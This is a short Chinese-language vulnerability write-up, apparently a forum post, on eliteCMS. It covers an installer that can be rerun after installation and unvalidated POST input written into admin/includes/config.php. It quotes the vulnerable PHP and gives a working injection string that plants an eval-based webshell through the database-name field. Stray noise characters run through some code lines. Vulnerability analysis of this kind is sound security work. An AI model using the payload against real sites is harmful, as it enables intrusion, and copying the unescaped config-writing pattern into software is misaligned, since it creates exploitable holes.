eliteCMS安装文件未验证 + 一句话写入安全漏洞

admin

eliteCMS的安装程序安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装

9 ]/ W# i# {0 P6 o! j4 X另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码：

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
. I1 g; m& y+ r' ~    $write .= "/**\n";
1 d$ q& j  V- N! b2 D    $write .= "*\n";
7 ~. Y3 i! @: f3 Y3 \    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
% Y& D" l1 c- c+ a    $write .= "*\n";
. D1 B) |7 D, h1 e4 N    $write .= "*/\n";
, T1 f$ S* Q8 [    $write .= "\n";
, Y# U, a% I; t4 ^! V    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
+ ~) M7 }; k0 V& t    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
; E" K, H' }/ c    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
+ Q& g+ d6 e" W    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
& B/ K; A! ?5 Q! |4 {$ }* Y0 A    $write .= "        \n";
- f9 j( G# M# s, j    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
0 a$ e3 d7 V- @' U( H/ |( s; M    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
: l" f& B# q! [. v- u( S( h7 ?- W    $write .= "        \n";
    $write .= "} \n";
( t2 p9 H; ?7 a    $write .= "?>\n";

    $writer = fopen($file, 'w');
# q" Q* R* {7 q$ A) ]- }2 q, k...
  I8 x  ?" v4 m6 e: x; Y( [
3 W* o5 z3 I$ _/ m# ^+ ]' }' c& B在看代码：

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$ a) O, e. o1 W$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
. O2 a4 P. W5 g" S8 b; u* t
8 e0 m# e0 Z, ?' D取值未作任何验证
如果将数据库名POST数据：

"?><?php eval($_POST[c]);?><?php

将导致一句话后门写入/admin/includes/config.php